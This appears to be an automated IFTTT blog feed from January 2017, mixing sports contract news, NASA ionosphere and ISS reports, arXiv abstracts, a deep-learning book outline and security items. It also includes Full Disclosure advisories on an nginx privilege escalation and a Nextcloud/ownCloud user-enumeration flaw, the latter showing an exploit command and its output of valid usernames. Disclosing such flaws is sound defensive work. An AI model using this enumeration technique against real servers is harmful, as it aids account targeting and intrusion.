Latest YouTube Video

Saturday, January 14, 2017

Text the Police

In addition to anonymously texting tips to the MPD, community members can now use their cell phone to send pictures or video about serious or ...

from Google Alert - anonymous http://ift.tt/2jcndyl
via IFTTT

Student Faces 10 Years In Prison For Creating And Selling Limitless Keylogger

A 21-year-old former Langley High School student, who won a Programmer of the Year Award in high school, pleaded guilty on Friday to charges of developing and selling custom key-logging malware that infected thousands of victims. Zachary Shames from Virginia pleaded guilty in a federal district court and now faces a maximum penalty of up to 10 years in prison for his past deeds. Shames was


from The Hacker News http://ift.tt/2irHUnP
via IFTTT

Support anonymous user

Thank you for the module. Is there a way to add the user initials html to anonymous users too?

from Google Alert - anonymous http://ift.tt/2jIt911
via IFTTT

Explained — What's Up With the WhatsApp 'Backdoor' Story? Feature or Bug!

What is a backdoor? By definition: "Backdoor is a feature or defect of a computer system that allows surreptitious unauthorized access to data," either the backdoor is in encryption algorithm, a server or in an implementation. Yesterday, we published a story based on findings reported by security researcher Tobias Boelter that suggests WhatsApp has a backdoor that "could allow" an attacker,


from The Hacker News http://ift.tt/2jjgEMa
via IFTTT

Offering to maintain Anonymous login module

I'd like to apply for maintainer access for Anonymous login module (http://ift.tt/2e1Q9JM). Because maintainer of this ...

from Google Alert - anonymous http://ift.tt/2jatAlz
via IFTTT

Exploring Earth's Ionosphere: Limb view with approach

This visualization presents several 'reference models' for studying Earth's ionosphere. It opens with a full-disk view of Earth, then zooms-in to a close-up view of Earth's limb and ionospheric data-driven models, over a fixed geographic location - off the Atlantic coast of South America. Reference models are used to define well-established knowledge and facilitate mapping out areas for future exploration. The models might be described as semi-empirical, in that they are generated using many measurements at a varietly of locations, and those measurements are used to constrain a theoretical model which is used to estimate measurements at locations where an actual measurement is not available. Three models important in ionospheric physics are presented in this visualization. International Reference Ionosphere (IRI) This model provides parameters such as electron temperature and density, ion temperature and the densities of various ions (O+, H+, He+, NO+, O2+). In this visualization, we display the atomic oxygen positive ion (a single atom ion) density at an altitude of 350 kilometers. On the limb of Earth, we present a vertical cross-section of the model, illustrating how the density varies with altitude and providing an altitude scale for comparison. This dataset exhibits two notable characteristics. Daily variation: The oxygen ion density increases during the day and then decreases after nightfall. This is due to photoionization by solar ultraviolet light, which increases with sunrise to a maximum at local noon, and then decreases towards evening. Appleton Anomaly: One of the more striking features of the ion density is the daytime enhancement is split into two regions, distributed symmetrically above and below the magnetic equator. This feature was discovered by Edward Appleton in 1946. It is now understood to be an effect of the interaction of Earth's geomagnetic field with upper atmosphere electric fields, and often referred to as the 'fountain effect,' explained in 1965. The electric fields lift ions and electrons upward by E-cross-B drift (Plasma Zoo). At higher altitudes, the upward drift decreases and the geomagnetic field and gravity dominate the motion, guiding the charged particles earthward. Horizontal Wind Model (HWM) This model provides speed and direction of horizontal (parallel to Earth's surface) winds constructed from over 70 million ground-based and satellite measurements. Two altitude levels are displayed in this visualization: 350 kilometers (same altitude as the IRI oxygen ion data) in violet glyphs, and 100 kilometers (white glyphs). This model only extends to 60 degrees latitude, so there are gaps around the poles in this visualization. One of the most notable characteristics in this dataset, particularly the 350 kilometer data, is how the winds are driven by the daily solar heating cycle. As the sun rises, the upper atmosphere is heated by solar ultraviolet light. This creates a high-pressure region which drives the atmosphere away from direct sunlight; westward in the morning and eastward in the afternoon. As the sun sets and the atmosphere cools, we see the wind reverse, filling in the now cooler and lower-pressure region. International Geomagnetic Reference Field-12 (IGRF-12) This model provides the structure of Earth's magnetic field which is a dominant influence on the motion of electrons and ions in the ionosphere. The geomagnetic field changes very slowly over decades. For this visualization, we display only a few field lines (golden wire-like structures) near the geomagnetic equator. As we observe the daily variation of the data, particularly the oxygen ions, we see the Appleton anomaly is hedged in by the low-latitude geomagnetic field. References NOAA/National Geophysical Data Center. International Geomagnetic Reference FieldErwan Thebault, Christopher C. Finlay, et al. International Geomagnetic Reference Field: the 12th generation. Earth, Planets and Space 67:79 (2015)Dieter Bilitza. The International Reference Ionosphere - Status 2013. Advances in Space Research, Volume 55, p. 1914-1927 (2015)Douglas P. Drob, John T. Emmert, et al. An update to the Horizontal Wind Model (HWM): The quiet time thermosphere. Earth and Space Science, vol. 2, issue 7, pp. 301-319Edward V. Appleton. Two Anomalies in the Ionosphere. Nature, Volume 157, pp. 691 (1946)E. N. Bramley and M. Peart. Diffusion and electromagnetic drift in the equatorial F2-region. Journal of Atmospheric and Terrestrial Physics, vol. 27, pp. 1201-1211 (1965)R.J. Moffett & W.B. Hanson. Effect of Ionization Transport on the Equatorial F-Region. Nature 206, pp705-706 (1965)

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2iuKGfq
via IFTTT

Exploring Earth's Ionosphere: Limb view

This visualization presents several 'Reference models' for studying Earth's ionosphere. It presents a close-up view of Earth's limb and ionospheric data-driven models, over a fixed geographic location - off the Atlantic coast of South America. Reference models are used to define well-established knowledge and facilitate mapping out areas for future exploration. The models might be described as semi-empirical, in that they are generated using many measurements at a varietly of locations, and those measurements are used to constrain a theoretical model which is used to estimate measurements at locations where an actual measurement is not available. Three models important in ionospheric physics are presented in this visualization. International Reference Ionosphere (IRI) This model provides parameters such as electron temperature and density, ion temperature and the densities of various ions (O+, H+, He+, NO+, O2+). In this visualization, we display the atomic oxygen positive ion (a single atom ion) density at an altitude of 350 kilometers. On the limb of Earth, we present a vertical cross-section of the model, illustrating how the density varies with altitude and providing an altitude scale for comparison. This dataset exhibits two notable characteristics. Daily variation: The oxygen ion density increases during the day and then decreases after nightfall. This is due to photoionization by solar ultraviolet light, which increases with sunrise to a maximum at local noon, and then decreases towards evening. Appleton Anomaly: One of the more striking features of the ion density is the daytime enhancement is split into two regions, distributed symmetrically above and below the magnetic equator. This feature was discovered by Edward Appleton in 1946. It is now understood to be an effect of the interaction of Earth's geomagnetic field with upper atmosphere electric fields, and often referred to as the 'fountain effect,' explained in 1965. The electric fields lift ions and electrons upward by E-cross-B drift (Plasma Zoo). At higher altitudes, the upward drift decreases and the geomagnetic field and gravity dominate the motion, guiding the charged particles earthward. Horizontal Wind Model (HWM) This model provides speed and direction of horizontal (parallel to Earth's surface) winds constructed from over 70 million ground-based and satellite measurements. Two altitude levels are displayed in this visualization: 350 kilometers (same altitude as the IRI oxygen ion data) in violet glyphs, and 100 kilometers (white glyphs). This model only extends to 60 degrees latitude, so there are gaps around the poles in this visualization. One of the most notable characteristics in this dataset, particularly the 350 kilometer data, is how the winds are driven by the daily solar heating cycle. As the sun rises, the upper atmosphere is heated by solar ultraviolet light. This creates a high-pressure region which drives the atmosphere away from direct sunlight; westward in the morning and eastward in the afternoon. As the sun sets and the atmosphere cools, we see the wind reverse, filling in the now cooler and lower-pressure region. International Geomagnetic Reference Field-12 (IGRF-12) This model provides the structure of Earth's magnetic field which is a dominant influence on the motion of electrons and ions in the ionosphere. The geomagnetic field changes very slowly over decades. For this visualization, we display only a few field lines (golden wire-like structures) near the geomagnetic equator. As we observe the daily variation of the data, particularly the oxygen ions, we see the Appleton anomaly is hedged in by the low-latitude geomagnetic field. References NOAA/National Geophysical Data Center. International Geomagnetic Reference FieldErwan Thebault, Christopher C. Finlay, et al. International Geomagnetic Reference Field: the 12th generation. Earth, Planets and Space 67:79 (2015)Dieter Bilitza. The International Reference Ionosphere - Status 2013. Advances in Space Research, Volume 55, p. 1914-1927 (2015)Douglas P. Drob, John T. Emmert, et al. An update to the Horizontal Wind Model (HWM): The quiet time thermosphere. Earth and Space Science, vol. 2, issue 7, pp. 301-319Edward V. Appleton. Two Anomalies in the Ionosphere. Nature, Volume 157, pp. 691 (1946)E. N. Bramley and M. Peart. Diffusion and electromagnetic drift in the equatorial F2-region. Journal of Atmospheric and Terrestrial Physics, vol. 27, pp. 1201-1211 (1965)R.J. Moffett & W.B. Hanson. Effect of Ionization Transport on the Equatorial F-Region. Nature 206, pp705-706 (1965)

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2jtKBXP
via IFTTT

Friday, January 13, 2017

Anonymous squeals on Wikileaks & Julian Assange

Yesterday, one of several quasi-official Twitter accounts of Anonymous, the international hacktivist group (@YourAnonCentral — not a verified account ...

from Google Alert - anonymous http://ift.tt/2jGGWF4
via IFTTT

Orioles and P Chris Tillman agree to one-year, $10.5 million deal to avoid arbitration; 16-6 with 3.77 ERA in 2016 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Anonymous Publish Events

I thought that this issue was resolved but it is not. I am having problems with event manager on both of my sites. I allow anonymous event submissions ...

from Google Alert - anonymous http://ift.tt/2iucyQR
via IFTTT

anonymous $5000 donation vaults fundraiser for injured food cart vendor closer to goal

An online fundraiser for Sameh Bules, the food cart vendor on 86th Street who was stabbed earlier this month, is nearing its $10,000 goal thanks to ...

from Google Alert - anonymous http://ift.tt/2ilWOkn
via IFTTT

Ravens: Former president David Modell, 55, dies after battle with lung cancer; son of late owner Art Modell (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

I have a new follower on Twitter


MLB Roundup
Here to enjoy the ride of @MLB with everyone! #MLB #FantasyBaseball


Following: 6666 - Followers: 35835

January 13, 2017 at 03:02PM via Twitter http://twitter.com/MLB_Roundup

Orioles and 3B Manny Machado agree to one-year, $11.5M deal to avoid arbitration - reports; .294 with 37 HR in 2016 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Orioles and P Zach Britton agree to one-year, $11.4M deal to avoid arbitration - Crasnick; 0.54 ERA and 47 saves in 2016 (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Table of Contents: Deep Learning for Computer Vision with Python

dl_ks_book_formatted

A couple of days ago I mentioned that on Wednesday, January 18th at 10AM EST I am launching a Kickstarter to fund my new book — Deep Learning for Computer Vision with Python.

As you’ll see later in this post, there is a huge amount of content I’ll be covering, so I’ve decided to break the book down into three volumes called “bundles”.

bundle includes the eBook, video tutorials, and source code for a given volume.

Each bundle builds on top of the others and includes all content from lower bundles. You should choose a bundle based on how in-depth you want to study deep learning and computer vision:

  • Starter Bundle: A great fit for those taking their first steps toward deep learning for image classification mastery.
  • Practitioner Bundle: Perfect for readers who are ready to study deep learning in-depth, understand advanced techniques, and discover common best practices and rules of thumb.
  • ImageNet Bundle: The complete deep learning for computer vision experience. In this bundle, I demonstrate how to train large-scale neural networks from scratch on the massive ImageNet dataset. You can’t beat this bundle.

The complete Table of Contents for each bundle is listed in the next section.

Starter Bundle

The Starter Bundle includes the following topics:

Machine Learning Basics

Take the first step:

  • Learn how to set up and configure your development environment to study deep learning.
  • Understand image basics, including coordinate systems; width, height, depth; and aspect ratios.
  • Review popular image datasets used to benchmark machine learning, deep learning, and Convolutional Neural Network algorithms.

Form a solid understanding of machine learning basics, including:

  • The simple k-NN classifier.
  • Parameterized learning (i.e., “learning from data”)
  • Data and feature vectors.
  • Understanding scoring functions.
  • How loss functions work.
  • Defining weight matrices and bias vectors (and how they facilitate learning).

Study basic optimization methods (i.e., how “learning” is actually done) via:

  • Gradient Descent
  • Stochastic Gradient Descent
  • Batched Stochastic Gradient Descent

Fundamentals of Neural Networks

Discover feedforward network architectures:

  • Implement the classic Perceptron algorithm by hand.
  • Use the Perceptron algorithm to learn actual functions (and understand the limitations of the Perceptron algorithm).
  • Take an in-depth dive into the Backpropagation algorithm.
  • Implement Backpropagation by hand using Python + NumPy.
  • Utilize a worksheet to help you practice the Backpropagation algorithm.
  • Grasp multi-layer networks (and train them from scratch).
  • Implement neural networks both by hand and with the Keras library.

Introduction to Convolutional Neural Networks

Start with the basics of convolutions:

  • Understand convolutions (and why they are so much easier to grasp than they seem).
  • Study Convolutional Neural Networks (what they are used for, why they work so well for image classification, etc.).
  • Train your first Convolutional Neural Network from scratch.

Review the building blocks of Convolutional Neural Networks, including:

  • Convolutional layers
  • Activation layers
  • Pooling layers
  • Batch Normalization
  • Dropout

Uncover common architectures and training patterns:

  • Discover common network architecture patterns you can use to design architectures of your own with minimal frustration and headaches.
  • Utilize out-of-the-box CNNs for classification that are pre-trained and ready to be applied to your own images/image datasets (VGG16, VGG19, ResNet50, etc.)
  • Save and load your own network models from disk.
  • Checkpoint your models to spot high performing epochs and restart training.
  • Learn how to spot underfitting and overfitting, allowing you to correct for them and improve your classification accuracy.
  • Utilize decay and learning rate schedulers.
  • Train the classic LeNet architecture from scratch to recognize handwritten digits.

Work With Your Own Custom Datasets

Working with your custom datasets + deep learning is easy:

  • Learn how to gather your own training images.
  • Discover how to annotate and label your dataset.
  • Train a Convolutional Neural Network from scratch on top of your dataset.
  • Evaluate the accuracy of your model.
  • …all of this explained by demonstrating how to gather, annotate, and train a CNN to break image captchas.

Practitioner Bundle

The Practitioner Bundle includes everything in the Starter Bundle. It also includes the following topics.

Advanced Convolutional Neural Networks

Discover how to use transfer learning to:

  • Treat pre-trained networks as feature extractors to obtain high classification accuracy with little effort.
  • Utilize fine-tuning to boost the accuracy of pre-trained networks.
  • Apply data augmentation to increase network classification accuracy without gathering more training data.

Work with deeper network architectures:

  • Code the seminal AlexNet architecture.
  • Implement the VGGNet architecture (and variants of).

Explore more advanced optimization algorithms, including:

  • RMSprop
  • Adagrad
  • Adadelta
  • Adam
  • Adamax
  • Nadam
  • …and best practices to fine-tune SGD parameters.

Best Practices to Boost Network Performance

Uncover common techniques & best practices to improve classification accuracy:

  • Understand rank-1 and rank-5 accuracy (and how we use them to measure the classification power of a given network).
  • Utilize image cropping for an easy way to boost accuracy on your test set.
  • Explore how network ensembles can be used to increase classification accuracy simply by training multiple networks.
  • Discover my optimal pathway for applying deep learning techniques to maximize classification accuracy (and which order to apply these techniques in to achieve greatest effectiveness).

Scaling to Large Image Datasets

Work with datasets too large to fit into memory:

  • Learn how to convert an image dataset from raw images on disk to HDF5 format, making networks easier (and faster) to train.
  • Compress large image datasets into efficiently packed record files.

Compete in deep learning challenges and competitions:

  • Compete in Stanford’s cs231n Tiny ImageNet classification challenge…and take home the #1 position.
  • Train a network on the Kaggle Dogs vs. Cats challenge and claim a position in the top-25 leaderboard with minimal effort.

Object Detection and Localization

Detect objects in images using deep learning by:

  • Utilizing naive image pyramids and sliding windows for object detection.
  • Training your own YOLO detector for recognizing objects in images/video streams in real-time.

ImageNet Bundle

The ImageNet Bundle includes everything in the Starter Bundle and Practitioner Bundle. It also includes the following additional topics:

ImageNet: Large Scale Visual Recognition Challenge

Train state-of-the-art networks on the ImageNet dataset:

  • Discover what the massive ImageNet (1,000 category) dataset is and why it’s considered the de-facto challenge to benchmark image classification algorithms.
  • Obtain the ImageNet dataset.
  • Convert ImageNet into a format suitable for training.
  • Learn how to utilize multiple GPUs to train your network in parallelgreatly reducing training time.
  • Train AlexNet on ImageNet from scratch.
  • Train VGGNet from the ground-up on ImageNet.
  • Apply the SqueezeNet architecture to ImageNet to obtain a (high accuracy) model, fully deployable to smaller devices, such as the Raspberry Pi.

ImageNet: Tips, Tricks, and Rules of Thumb

Unlock the same techniques deep learning pros use on ImageNet:

  • Save weeks (and even months) of training time by discovering learning rate schedules that actually work.
  • Spot overfitting on ImageNet and catch it before you waste hours (or days) watching your validation accuracy stall.
  • Learn how to restart training from saved epochs, lower learning rates, and boost accuracy.
  • Uncover methods to quickly tune hyperparameters to massive networks.

Case Studies

Discover how to solve real-world deep learning problems, including:

  • Train a network to predict the gender and age of people in images using deep learning techniques.
  • Automatically classify car types using Convolutional Neural Networks.
  • Determine (and correct) image orientation using CNNs.

So there you have it — the complete Table of Contents for Deep Learning for Computer Vision with Python. I hope after looking over this list you’re as excited as I am!

I also have some secret bonus chapters that I’m keeping under wraps until the Kickstarter officially launches — stay tuned for more details.

To be notified when more Kickstarter announcements go live (including ones I won’t be publishing on this blog), be sure to signup for the Kickstarter notification list!

The post Table of Contents: Deep Learning for Computer Vision with Python appeared first on PyImageSearch.



from PyImageSearch http://ift.tt/2iQ6OP1
via IFTTT

WhatsApp Backdoor allows Hackers to Intercept and Read Your Encrypted Messages

Most people believe that end-to-end encryption is the ultimate way to protect your secret communication from snooping, and it does, but it can be intercepted if not implemented correctly. After introducing "end-to-end encryption by default" last year, WhatsApp has become the world's largest secure messaging platform with over a billion users worldwide. But if you think your conversations are


from The Hacker News http://ift.tt/2ikRZHY
via IFTTT

Anonymous Review: Wait for Me

Ever since author Kathleen Hale doxxed an anonymous reviewer, a lot of folks have been afraid to critically review a book. It's difficult to be completely ...

from Google Alert - anonymous http://ift.tt/2j8gjdr
via IFTTT

Orioles: IF Ryan Flaherty ($1.8M) and P T.J. McFarland ($685,000) agree to one-year deals to avoid arbitration - reports (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

ISS Daily Summary Report – 1/12/2017

Extravehicular Activity (EVA) Preparation:  Today the crew performed final preparation for EMU EVA #39 (Channel 1A Battery R&R). Hatch open is scheduled tomorrow, Friday January 6th at 12:10 GMT (6:10 CST). Earlier today the crew completed the pre-EVA health status exams, final EVA tool configuration and procedure reviews.  Ground specialists and the crewmembers participated in a conference to discuss any final questions.  Finally, the crew prepared the Equipment lock for the EVA.  Mobile Servicing System (MSS) Operations:  Robotics Ground Controllers completed all battery moves in preparation for Friday’s EVA. Last night, the Robotics Ground Controllers powered up the MSS and maneuvered the Space Station Remote Manipulator System (SSRMS) and the Special Purpose Dexterous Manipulator (SPDM) Body and Arm2 as required to stow the Robotic Offset Tool (ROST) in the SPDM Tool Holder Assembly (THA).  They then maneuvered the SSRMS and SPDM Body and Arm2 as required to remove the Nickel-Hydrogen (NiH2) battery from slot 2 on the 1A Integrated Electronics Assembly (IEA).  Finally the Robotics Ground Controllers maneuvered the SSRMS and SPDM to a park position.  Currently SPDM is holding three NiH2 batteries (one on each arm plus another on Enhanced ORU Temporary Platform). These batteries will be moved to the EP post-EVA. Due to some issues encountered yesterday with SPDM’s ROST tool, ground teams were unable to secure the H1 bolts on the Li-Ion batteries in slot 1 and 5, so the EV crewmembers will be picking that up as an EVA task, similar to what we did in last week’s EVA. Microgravity Science Glovebox (MSG) Laptop Hard Drive Replacement: Today the crew replaced the MSG hard drive and successfully completed the software installation. On GMT 009 the MSG laptop that supports the Packed Bed Reactor Experiment (PBRE) lost communication. Over the last few days the crew checked the cables, rebooted the laptop, and reset the hard drive before declaring it failed and replacing the hard drive. The MSG is fully operational and there was no loss of science or data to the PBRE.  Today’s Planned Activities All activities were completed unless otherwise noted. Biochemical urine test, Sample collection Biochemical urine test, Sample Measurements Biochemical urine test, Closeout Ops KORREKTSIYA. NEUROIMMUNITET. Collection of Blood Samples KORREKTSIYA. NEUROIMMUNITET. Venous blood sample processing using Plasma-03 centrifuge Insertion of Russian experiments blood samples into MELFI KORREKTSIYA. NEUROIMMUNITET. Handover to USOS for MELFI Insertion Periodic Health Status (PHS) Pre EVA Examination Setup RELAKSATSIYA Hardware Setup Periodic Health Status (PHS) Pre EVA Examination Photograph Ceres, then stow Ceres and Cataliss. Pre-EVA Periodic Health Status Examination – Stow Extravehicular Activity (EVA) Tool Configuring RELAKSATSIYA. Parameter Settings Adjustment. PELLE Data Download & placement before EVA СОЖ maintenance RELAKSATSIYA. Observation.  Extravehicular Activity (EVA) Tool Audit. RELAKSATSIYA. Closeout Ops and Hardware Removal. Maintenance activation of Atmosphere Purification System Emergency Vacuum Valves [АВК СОА] from the Sparest Kit (004173R, СМ1РО_3_321_1, white bag II-1/256-1, enclosure for [АВК] (007223R) Extravehicular Activity (EVA) Procedure Review Extravehicular Activity (EVA) Procedure Conference Multi-purpose Small Payload Rack (MSPR) /Group Combustion Module (GCM) Component Deactivation ISS HAM Service Module Pass Extravehicular Activity (EVA) iPad Contingency Procedures preparation Space Headaches – Weekly Questionnaire Audit of FGB interior panel latches Exchange Hard Drive for MSG Laptop computer Audit of cables in space behind SM panels 228 and 229А. Equipment Lock (E-LK) Preparation Station Support Computer (SSC) 6 and 17 Reload Preparation MSG MLC Software Load Initiate water transfer from CWC-I to ЕДВ Cleaning FGB Gas-Liquid Heat Exchanger (ГЖТ)  Detachable Screens 1, 2, 3 Terminate water transfer from CWC-I to ЕДВ INTERACTION-2. Experiment Ops Replacing filters in FGB ПС1, ПС2 Dust Collectors (ФГБ1ПГО_4_419_1, bag 429-21 (00068135R)). Discard de-installed items. Reflect changes in IMS Delta file prep RELAKSATSIYA. Charging battery for Relaksatstiya experiment (initiate) Completed Task List Items Node 3 Axial Shield Bundle Build EVA Tool Configuration Manufacturing Device Print Removal, Clean and Stow Biomolecule Sequencer Sample Stop Payload NAS Reboot Strange Tool Bag Stowage Reconfiguration  Ground Activities All activities were completed unless otherwise noted. HTV heater error troubleshooting  Three-Day Look Ahead: Friday, 01/13: S4 Battery R&R EMU EVA Saturday, 01/14: EVA Debrief, EVA Camera Disassembly, Airlock Deconfig, EMU Recharge Sunday, 01/15: Crew Off Duty  QUICK ISS Status – Environmental Control Group:     Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) Off          [СКВ] 2 – SM Air Conditioner System (“SKV2”) On Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Operate Major Constituent Analyzer (MCA) Node 3 Idle Oxygen Generation Assembly (OGA) Process Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/2jrjcWv
via IFTTT

via Instagram http://ift.tt/2iPkWIo

[FD] Nginx (Debian-based + Gentoo distros) - Root Privilege Escalation [CVE-2016-1247 UPDATE]

[Updated CVE-2016-1247 advisory] Nginx packages on Gentoo distros were also found vulnerable to Root Privilege Escalation (CVE-2016-1247) exploit I discovered last year. Updated advisory URL: http://ift.tt/2fU66zJ Gentoo notice: http://ift.tt/2j5Y1LR Follow: https://twitter.com/dawid_golunski for more vulns. Regards, Dawid Golunski http://ift.tt/2fcYckq t: @dawid_golunski

Source: Gmail -> IFTTT-> Blogger

anonymous

Question. Replicate 1D (scattered) profile along surface of cone. Suppose I have scattered data in 3 dimensions that gives the density at various points ...

from Google Alert - anonymous http://ift.tt/2irtPtF
via IFTTT

Donald Trump appoints a CyberSecurity Advisor Whose Own Site is Damn Vulnerable

Former New York City Mayor Rudolph W. Giuliani has been appointed as a cyber security advisor for the President-elect Donald Trump, but it appears that he never actually checked the security defenses of his own company's website. Giuliani is going to head a new Cybersecurity Working group for the President-elect, and "will be sharing his expertise and insight as a trusted friend concerning


from The Hacker News http://ift.tt/2ijyJuv
via IFTTT

dotnet/roslyn

[proposal] Support anonymous delegate type #16488. Open. Thaina opened this Issue 13 minutes ago · 0 comments ...

from Google Alert - anonymous http://ift.tt/2iqEyEQ
via IFTTT

Edge On NGC 891


Large spiral galaxy NGC 891 spans about 100 thousand light-years and is seen almost exactly edge-on from our perspective. In fact, about 30 million light-years distant in the constellation Andromeda, NGC 891 looks a lot like our Milky Way. At first glance, it has a flat, thin, galactic disk of stars and a central bulge cut along the middle by regions of dark obscuring dust. But remarkably apparent in NGC 891's edge-on presentation are filaments of dust that extend hundreds of light-years above and below the center line. The dust has likely been blown out of the disk by supernova explosions or intense star formation activity. Fainter galaxies can also be seen near the edge-on disk in this deep portrait of NGC 891. (Editor's Note: The NGC 891 image used in today's APOD posting has been replaced and the credit corrected to indicate the author of the original work.) via NASA http://ift.tt/2jbfsv2

Ye Olde Tyme Heliophysics Map

If Columbus had been a heliophysicist, what maps would he have consulted? Here's some artist conceptions of our solar system might be presented for our explorations.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/2jdHA0r
via IFTTT

Thursday, January 12, 2017

Anonymous image board by state

Anonymous image board by stateAn imageboard or image board is a type of Internet forum which operates mostly via posting. . Kusaba X is still in ...

from Google Alert - anonymous http://ift.tt/2iiYRWs
via IFTTT

Anonymous

Showing 1-1 of 1 results for “Anonymous”. Sorted by date added, Popularity, Relevance, Release date, Title, Author. Filters. Filter search results.

from Google Alert - anonymous http://ift.tt/2jdp8oG
via IFTTT

Proxy server anonymous ip address

Proxy server anonymous ip address Proxy servers have a number of limitations.. Flash Player can be used to reveal the web surfer's IP address even if ...

from Google Alert - anonymous http://ift.tt/2jC08nC
via IFTTT

Assertional Logic: Towards an Extensible Knowledge Model (extended abstract). (arXiv:1701.03322v1 [cs.AI])

We argue that extensibility is a key challenge for knowledge representation. For this purpose, we propose assertional logic - a knowledge model for easier extension with new AI building blocks. In assertional logic, all syntactic objects are categorized as set theoretic constructs including individuals, concepts and operators, and all kinds of knowledge are formalized by equality assertions. When extending with a new building block, one only needs to consider its interactions with the basic form of knowledge (i.e., equality assertions) without going deeper into its interactions with other existing ones. We first present a primitive form of assertional logic that uses minimal assumed knowledge and constructs. Then, we show how to extend it by definitions, which are special kinds of knowledge, i.e., assertions. As a case study, we show how assertional logic can be used to unify logic and probability, and more important AI building blocks including time.



from cs.AI updates on arXiv.org http://ift.tt/2iq8YqY
via IFTTT

Residual LSTM: Design of a Deep Recurrent Architecture for Distant Speech Recognition. (arXiv:1701.03360v1 [cs.LG])

In this paper, a novel architecture for a deep recurrent neural network, residual LSTM is introduced. A plain LSTM has an internal memory cell that can learn long term dependencies of sequential data. It also provides a temporal shortcut path to avoid vanishing or exploding gradients in the temporal domain. The proposed residual LSTM architecture provides an additional spatial shortcut path from lower layers for efficient training of deep networks with multiple LSTM layers. Compared with the previous work, highway LSTM, residual LSTM reuses the output projection matrix and the output gate of LSTM to control the spatial information flow instead of additional gate networks, which effectively reduces more than 10% of network parameters. An experiment for distant speech recognition on the AMI SDM corpus indicates that the performance of plain and highway LSTM networks degrades with increasing network depth. For example, 10-layer plain and highway LSTM networks showed 13.7% and 6.2% increase in WER over 3-layer baselines, respectively. On the contrary, 10-layer residual LSTM networks provided the lowest WER 41.0%, which corresponds to 3.3% and 2.8% WER reduction over 3-layer plain and highway LSTM networks, respectively. Training with both the IHM and SDM corpora, the residual LSTM architecture provided larger gain from increasing depth: a 10-layer residual LSTM showed 3.0% WER reduction over the corresponding 5-layer one.



from cs.AI updates on arXiv.org http://ift.tt/2jBW6vq
via IFTTT

Improving Sampling from Generative Autoencoders with Markov Chains. (arXiv:1610.09296v3 [cs.LG] UPDATED)

We focus on generative autoencoders, such as variational or adversarial autoencoders, which jointly learn a generative model alongside an inference model. Generative autoencoders are those which are trained to softly enforce a prior on the latent distribution learned by the inference model. We call the distribution to which the inference model maps observed samples, the learned latent distribution, which may not be consistent with the prior. We formulate a Markov chain Monte Carlo (MCMC) sampling process, equivalent to iteratively decoding and encoding, which allows us to sample from the learned latent distribution. Since, the generative model learns to map from the learned latent distribution, rather than the prior, we may use MCMC to improve the quality of samples drawn from the generative model, especially when the learned latent distribution is far from the prior. Using MCMC sampling, we are able to reveal previously unseen differences between generative autoencoders trained either with or without a denoising criterion.



from cs.AI updates on arXiv.org http://ift.tt/2e2Cspa
via IFTTT

Tuning Recurrent Neural Networks with Reinforcement Learning. (arXiv:1611.02796v4 [cs.LG] UPDATED)

The approach of training sequence models using supervised learning and next-step prediction suffers from known failure modes. For example, it is notoriously difficult to ensure multi-step generated sequences have coherent global structure. We propose a novel sequence-learning approach in which we use a pre-trained Recurrent Neural Network (RNN) to supply part of the reward value in a Reinforcement Learning (RL) model. Thus, we can refine a sequence predictor by optimizing for some imposed reward functions, while maintaining good predictive properties learned from data. We propose efficient ways to solve this by augmenting deep Q-learning with a cross-entropy reward and deriving novel off-policy methods for RNNs from KL control. We explore the usefulness of our approach in the context of music generation. An LSTM is trained on a large corpus of songs to predict the next note in a musical sequence. This Note RNN is then refined using our method and rules of music theory. We show that by combining maximum likelihood (ML) and RL in this way, we can not only produce more pleasing melodies, but significantly reduce unwanted behaviors and failure modes of the RNN, while maintaining information learned from data.



from cs.AI updates on arXiv.org http://ift.tt/2gcycJD
via IFTTT

[FD] nextcloud/owncloud user enumeration vulnerbility

nextcloud/owncloud user enumeration vulnerbility Severity: MEDIUM Discovered by: Fabian Fingerle (@otih__) http://ift.tt/2i7U4qw nextcloud/owncloud: Nextcloud is functionally very similar to the widely used Dropbox, with the primary functional difference being that Nextcloud is free and open-source, and thereby allowing anyone to install and operate it without charge on a private server. In contrast to proprietary services like Dropbox, the open architecture allows adding additional functionality to the server in form of so-called applications. Nextcloud is an actively maintained fork of ownCloud. (wikipedia) Desc: An independent research uncovered a user enumeration vulnerability in the password reset form. Response is revealing that account does or does not exist. Even possible that an attacker is able to determine encrypted user accounts, but has not been tested yet. Patching: vulnerbility reported 2016-03-26 and marked as enhancement http://ift.tt/2iNcjOi Exploit: $ pypy ex.py cloud.isp.com user.txt [+] owncloud / nextcloud user enumeration vulnerbility [-] [+] Collected all HTTP Cookie and Anti-CSRF-information [-] [+] user test is valid [+] user customer is valid [+] user n3rD is valid [+] user h4xx0r is valid [+] user admin is valid For updates follow: https://twitter.com/otih__ I'll send another email to the list once the trivial script is published.

Source: Gmail -> IFTTT-> Blogger

[FD] ICMPv6 PTBs and IPv6 frag filtering (particularly at BGP peers)

Folks, I'm curious about whether folks are filtering ICMPv6 PTB<1280 and/or IPv6 fragments targeted to BGP routers (off-list datapoints are welcome). In any case, you mind find it worth reading to check if you're affected (from Section 2 of recently-published RFC8021):

Source: Gmail -> IFTTT-> Blogger

[FD] Multiple vulnerabilities in cPanel <= 60.0.34

